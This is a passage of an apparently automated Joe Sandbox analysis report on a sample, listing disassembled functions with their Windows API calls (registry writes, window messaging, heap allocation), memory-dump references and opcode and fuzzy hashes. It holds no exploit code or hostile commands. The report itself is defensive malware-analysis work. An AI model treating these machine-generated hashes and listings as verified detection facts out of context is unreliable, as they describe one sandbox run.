                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DeleteObject
                                    • String ID:
                                    • API String ID: 1531683806-0
                                    • Opcode ID: ffa0341f0c7dc17d7bd65c0cdbc3a55fc417f94c9186baeb196416ddc2c2a0dd
                                    • Instruction ID: 551314a32d8c929f1119e63163136c479e62120c22fd6cd44f42ad7d58543b64
                                    • Opcode Fuzzy Hash: ffa0341f0c7dc17d7bd65c0cdbc3a55fc417f94c9186baeb196416ddc2c2a0dd
                                    • Instruction Fuzzy Hash: C43170762047419FC314DF69D984F6BB7E8FB88724F008A2EF55983291DB78E805CB65
                                    Function 02421D7F Relevance: 6.1, APIs: 4, Instructions: 96registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 02421DB5
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421E49
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421E6B
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 02421E95
                                    • lstrlen.KERNEL32(?), ref: 02421EA4
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 02421EC4
                                    • RegCloseKey.ADVAPI32(?), ref: 02421ED6
                                    • GlobalFree.KERNEL32(00000000), ref: 02421F4B
                                    • wsprintfA.USER32 ref: 02421F9F
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 02421FDB
                                    • RegCloseKey.ADVAPI32(?), ref: 02422284
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                    • String ID:
                                    • API String ID: 3359840872-0
                                    • Opcode ID: 452ffa6505b4b23851c2d00bfb45fa7ed92c78c70f77453fcff555a3f8cf9b03
                                    • Instruction ID: 51a3369d7a241a9992ab8206d79ddc18b97102a17d5ff7925d7433728ae1d992
                                    • Opcode Fuzzy Hash: 452ffa6505b4b23851c2d00bfb45fa7ed92c78c70f77453fcff555a3f8cf9b03
                                    • Instruction Fuzzy Hash: 5B413F75D04628DFDB24CF11CC84AEAB774BB98302F4446CAE50F6A285E7B15AC9CF51
                                    Function 00424660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMessagePos.USER32 ref: 004246F8
                                    • ScreenToClient.USER32(?,?), ref: 0042471A
                                    • ChildWindowFromPointEx.USER32(?,?,?,00000005), ref: 00424730
                                    • GetFocus.USER32 ref: 0042473B
                                      • Part of subcall function 004C08F3: SetFocus.USER32(?,00415589), ref: 004C08FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Focus$ChildClientFromMessagePointScreenWindow
                                    • String ID:
                                    • API String ID: 3117237277-0
                                    • Opcode ID: 99c277dedfeebed3fd86103635802da44b98bdce5a22c64355e2eff626e63002
                                    • Instruction ID: ee447ea767fe5f6216572504ee03ee72a4982fbcbcc5422467ee888aa4061a2b
                                    • Opcode Fuzzy Hash: 99c277dedfeebed3fd86103635802da44b98bdce5a22c64355e2eff626e63002
                                    • Instruction Fuzzy Hash: E221A731700611ABD624EB24DC81F6FB3A5EFC1308F14852EF9558B281DB38E8168BA9
                                    Function 00425330 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • StartPage.GDI32(?), ref: 00425375
                                    • EndPage.GDI32(?), ref: 0042539B
                                      • Part of subcall function 00433540: wsprintfA.USER32 ref: 0043354F
                                      • Part of subcall function 004C07B8: SetWindowTextA.USER32(?,?), ref: 004C07C6
                                    • UpdateWindow.USER32(?), ref: 004253EA
                                    • EndPage.GDI32(?), ref: 00425402
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Page$Window$StartTextUpdatewsprintf
                                    • String ID:
                                    • API String ID: 104827578-0
                                    • Opcode ID: 4af6d2610878254fcb9aacf580f9fdba793bf89d57895c7cc2ade0a511c32b56
                                    • Instruction ID: 17f6c7cbebb2f02d042c05a39c337fafc198f2229917925139d94f1e716f55f0
                                    • Opcode Fuzzy Hash: 4af6d2610878254fcb9aacf580f9fdba793bf89d57895c7cc2ade0a511c32b56
                                    • Instruction Fuzzy Hash: 1B214F71701F109BC264EB3AEC84B9BB7E8EFC4705F90482EE59FC7210E674A4468B58
                                    Function 00416530 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Parent$RectWindow
                                    • String ID:
                                    • API String ID: 2276825053-0
                                    • Opcode ID: e866cf4124e4a183c870b4a490bf8c08352d03a34987f18f515f4c66364cf337
                                    • Instruction ID: 52e91e8382f88d9713da7f41cad524f0fc2fe541d71ca2a05776442307ef9b71
                                    • Opcode Fuzzy Hash: e866cf4124e4a183c870b4a490bf8c08352d03a34987f18f515f4c66364cf337
                                    • Instruction Fuzzy Hash: A7115CB5600705ABD724DF69D884EABB7ADEF84244F00492EB84587305EA78EC45C6B4
                                    Function 00413B40 Relevance: 6.1, APIs: 4, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00413B9D
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00413BB6
                                    • GetStockObject.GDI32(00000011), ref: 00413BC1
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 00413BD4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$ObjectStock
                                    • String ID:
                                    • API String ID: 1309931672-0
                                    • Opcode ID: 58e035aa8d59b32cbd2a9e94defa4d7959ef378b32b15ef776c77956cf3c04a8
                                    • Instruction ID: 8d18389c94d41da159703fa336ab8a607e60b42911a6e7a0ecb826ba7fd3e7bd
                                    • Opcode Fuzzy Hash: 58e035aa8d59b32cbd2a9e94defa4d7959ef378b32b15ef776c77956cf3c04a8
                                    • Instruction Fuzzy Hash: 27118E72304210ABC654DF59EC40F9B73A9EF88752F04846AF6048B281DB74ED46C7A5
                                    Function 004273B0 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTopWindow.USER32(?), ref: 004273BD
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00427416
                                    • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00427426
                                    • GetWindow.USER32(00000000,00000002), ref: 0042742B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ChildParent
                                    • String ID:
                                    • API String ID: 1043810220-0
                                    • Opcode ID: 4fbc66927b68ffe35fdea525dc36c9708539294a11600888c5a77ecb7b83cfa5
                                    • Instruction ID: 7f7f93460a9e2ddd5ff19fc7a1770d69f31ee88421afc86ec8c72399d371ea53
                                    • Opcode Fuzzy Hash: 4fbc66927b68ffe35fdea525dc36c9708539294a11600888c5a77ecb7b83cfa5
                                    • Instruction Fuzzy Hash: 9401753178573276E2316629AC46F6F764C9F55B50F944126BB00EB2D0DE94EC0181BD
                                    Function 0044C870 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 0044C88B
                                    • SendMessageA.USER32(?,000083EB,?,00000000), ref: 0044C8B5
                                    • SendMessageA.USER32(?,000083EC,?,00000000), ref: 0044C8C9
                                    • SendMessageA.USER32(?,000083E9,?,00000000), ref: 0044C8EC
                                      • Part of subcall function 004C07DF: GetDlgCtrlID.USER32(?), ref: 004C07E9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID:
                                    • API String ID: 1383977212-0
                                    • Opcode ID: a1ab69eb120a8abbd1b8f1b8b0519f7a7cfeecc43f73fc990d88752513831c41
                                    • Instruction ID: 00bba7c99bbac2a6d83cd8c6a559a80e5d0f5ef373931b859708fea065ed9b2f
                                    • Opcode Fuzzy Hash: a1ab69eb120a8abbd1b8f1b8b0519f7a7cfeecc43f73fc990d88752513831c41
                                    • Instruction Fuzzy Hash: 350184B6601B14BBE254B6698CC1D2FB76DABC4B49B04451EF500D7781DE68FC024768
                                    Function 004B35DA Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 004B3602
                                    • RtlAllocateHeap.NTDLL(00000008,000041C4), ref: 004B3636
                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004B33A2,?,?,?,004ABA13,?,?,?), ref: 004B3650
                                    • HeapFree.KERNEL32(00000000,?,?,00000000,004B33A2,?,?,?,004ABA13,?,?,?,?,?,?), ref: 004B3667
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Heap$Allocate$AllocFreeVirtual
                                    • String ID:
                                    • API String ID: 94566200-0
                                    • Opcode ID: 8f3b93d3f8a5fef697591f1255293322349fd4427190a065af5e2b85deceded2
                                    • Instruction ID: 9f4a1679a6b2bf57918a65b3fd457ce8e5f5c3f5eb8e9cb4fbd4963eb8f28dfb
                                    • Opcode Fuzzy Hash: 8f3b93d3f8a5fef697591f1255293322349fd4427190a065af5e2b85deceded2
                                    • Instruction Fuzzy Hash: 57112870600201AFC7B08F1AEC85DA27BB7FB89725B18952BF256C72B1CB719945DF14
                                    Function 004BF599 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTopWindow.USER32(?), ref: 004BF5A7
                                    • SendMessageA.USER32(00000000,?,?,?), ref: 004BF5DD
                                    • GetTopWindow.USER32(00000000), ref: 004BF5EA
                                    • GetWindow.USER32(00000000,00000002), ref: 004BF608
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend
                                    • String ID:
                                    • API String ID: 1496643700-0
                                    • Opcode ID: 0d08776e8942e08ca592f45d50dc89b5ebf63781d49a8ec3e0b33e8996ca1901
                                    • Instruction ID: 9756b8d2e24d211fda192ceda1147f0c6b5ff3530c2c49301c62d9b94231b973
                                    • Opcode Fuzzy Hash: 0d08776e8942e08ca592f45d50dc89b5ebf63781d49a8ec3e0b33e8996ca1901
                                    • Instruction Fuzzy Hash: 9301003240111ABBCF125F65EC05DDF3B26AF45354F044426FE0455161D739CA36EBB9
                                    Function 004C42F3 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 004C431F
                                    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 004C4328
                                    • wsprintfA.USER32 ref: 004C4344
                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004C435D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
